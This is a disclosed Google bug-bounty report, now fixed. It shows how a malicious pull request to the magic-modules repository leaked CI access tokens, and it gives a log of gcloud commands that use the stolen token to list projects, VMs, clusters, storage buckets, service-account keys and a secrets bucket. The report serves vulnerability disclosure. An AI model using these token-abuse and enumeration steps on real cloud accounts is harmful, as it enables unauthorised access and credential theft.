Skip to Content (Press Enter)
Google
Bug Hunters
Internal GCP Access - GoogleCloudPlatform/magic-modules
Reported by:
Divyanshu
Google VRP
triaged
02:18 | Feb 7, 2023
accepted
03:55 | Feb 11, 2023
triaged
17:24 | Mar 3, 2023
accepted
04:30 | Mar 8, 2023
fixed
08:26 | Apr 7, 2023
reward decided
$31,337
Summary:
Internal GCP Access - GoogleCloudPlatform/magic-modules
Product:
Google OSS (open source software)
URL:
https://github.com/GoogleCloudPlatform/magic-modules/
Vulnerability type:
Remote Code Execution (RCE)
Details
Hi team,
Raising a malicious PR on internet can leak out access tokens which allows for backend GCP enumeration of resource being used by the build systems.
Steps :-
Raise a PR (Exploit PR in this case :
https://github.com/GoogleCloudPlatform/magic-modules/pull/7228
)
Wait for Access tokens to be retrived and we see that these access tokens are valid for multiple projects
[root@ip-172-31-86-82 ~]# gcloud --access-token-file /tmp/token projects list
PROJECT_ID                   NAME                         PROJECT_NUMBER
ci-bq-external-data-project  ci-bq-external-data-project  821080836656
ci-gke-43e65a86-495d         ci-gke-43e65a86              76432828804
ci-gsuite-sa-project         ci-gsuite-sa-project         1013948302907
ci-media-cdn-vod-project     ci-media-cdn-vod-project     979258774428
ci-terraform-validator-fef2  ci-terraform-validator       998476993360
ci-vm-module-2c6c            ci-vm-module                 1009530108401
ci-vm-module-87bd            ci-vm-module                 188723441739
f12debc7e5c0087c5p-tp        f12debc7e5c0087c5p-tp        348315023304
graphite-docker-images       graphite-docker-images       673497134629
Now we simply enumerate
Attack scenario
Enumeration done so far :-
[root@ip-172-31-86-82 ~]# gcloud --project ci-gke-43e65a86-495d --access-token-file /tmp/token compute instances list
NAME                                                 ZONE           MACHINE_TYPE   PREEMPTIBLE  INTERNAL_IP  EXTERNAL_IP     STATUS
gke-simple-zonal-cluste-acm-node-pool-68bcad25-4lzr  us-central1-a  e2-standard-4               10.0.0.4     34.170.211.41   RUNNING
gke-simple-zonal-cluste-acm-node-pool-68bcad25-7d2r  us-central1-a  e2-standard-4               10.0.0.6     104.154.79.164  RUNNING
gke-simple-zonal-cluste-acm-node-pool-68bcad25-np60  us-central1-a  e2-standard-4               10.0.0.5     34.67.29.131    RUNNING
gke-simple-zonal-cluste-acm-node-pool-68bcad25-v0m9  us-central1-a  e2-standard-4               10.0.0.3     34.71.202.178   RUNNING
safer-cluster-iap-bastion-bastion                    us-central1-a  g1-small                    10.10.10.2                   RUNNING
[root@ip-172-31-86-82 ~]# gcloud --project ci-gke-43e65a86-495d --access-token-file /tmp/token container clusters list
NAME                  LOCATION       MASTER_VERSION  MASTER_IP      MACHINE_TYPE   NODE_VERSION      NUM_NODES  STATUS
simple-zonal-cluster  us-central1-a  1.24.7-gke.900  35.224.32.156  e2-standard-4  1.24.5-gke.600 *  4          RUNNING

* - There is an upgrade available for your cluster(s).

To upgrade nodes to the latest available version, run
  $ gcloud container clusters upgrade NAME
[root@ip-172-31-86-82 ~]# gcloud --project ci-bq-external-data-project --access-token-file /tmp/token storage ls
gs://ci-bq-external-data/
[root@ip-172-31-86-82 ~]# gcloud --project ci-bq-external-data-project --access-token-file /tmp/token storage ls gs://ci-bq-external-data/
gs://ci-bq-external-data/bigquery-external-table-test.csv
gs://ci-bq-external-data/hive_partition_example/
[root@ip-172-31-86-82 ~]# gcloud --project ci-bq-external-data-project --access-token-file /tmp/token compute instances list
Listed 0 items.
[root@ip-172-31-86-82 ~]# gcloud --project ci-bq-external-data-project --access-token-file /tmp/token iam service-accounts list
DISPLAY NAME                                         EMAIL                                                                        DISABLED
ci-bq-external-data-project Project Service Account  project-service-account@ci-bq-external-data-project.iam.gserviceaccount.com  False
[root@ip-172-31-86-82 ~]# gcloud --project ci-bq-external-data-project --access-token-file /tmp/token iam service-accounts keys list --iam-account project-service-account@ci-bq-external-data-project.iam.gserviceaccount.com
KEY_ID                                    CREATED_AT            EXPIRES_AT            DISABLED
496c1979068d16025af9b21dee633ab3a937b81f  2022-11-25T16:03:52Z  2024-11-27T09:05:32Z
[root@ip-172-31-86-82 ~]# gcloud --project ci-gsuite-sa-project --access-token-file /tmp/token storage ls
gs://ci-gsuite-sa-secrets/
[root@ip-172-31-86-82 ~]# gcloud --project ci-gsuite-sa-project --access-token-file /tmp/token storage ls gs://ci-gsuite-sa-secrets/
gs://ci-gsuite-sa-secrets/gsuite-sa.json
[root@ip-172-31-86-82 ~]# gcloud --project graphite-docker-images --access-token-file /tmp/token storage ls
gs://artifacts.graphite-docker-images.appspot.com/
gs://cloud-build-bigquery-notifiers/
gs://cloud-build-chat-notifiers/
gs://gcf-sources-673497134629-us-central1/
gs://graphite-docker-images.appspot.com/
gs://graphite-docker-images_cloudbuild/
gs://staging.graphite-docker-images.appspot.com/
gs://us.artifacts.graphite-docker-images.appspot.com/
gs://vcr-cassettes/
gs://vcr-logs/
登录
使用 Google 账号登录